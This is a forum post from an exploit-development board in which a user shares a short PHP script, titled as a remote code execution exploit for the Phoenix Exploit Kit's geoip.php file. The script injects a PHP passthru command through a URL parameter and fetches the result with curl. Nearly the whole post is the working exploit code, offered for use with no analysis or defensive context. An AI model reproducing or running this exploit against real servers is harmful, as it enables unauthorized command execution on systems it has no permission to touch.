Jump to content
Jako

[PHP] Phoenix Exploit Kit RCE

By Jako, in Reverse engineering & exploit development

Recommended Posts

Jako Newbie

Jako

Posted
Posted 
<?php
/*
#
# Phoenix Exploit Kit
# 	- Remote Code Execution
#	: /includes/geoip.php
*/

$site = "http://127.0.0.1/phoenix/";
$target = "includes/geoip.php?bdr=";
$payload = "passthru('uname -a')";

function curl_get($url) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
	$output = curl_exec($ch);
	curl_close($ch);
	return $output;
}

echo curl_get($site.$target.$payload);

?>

 

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...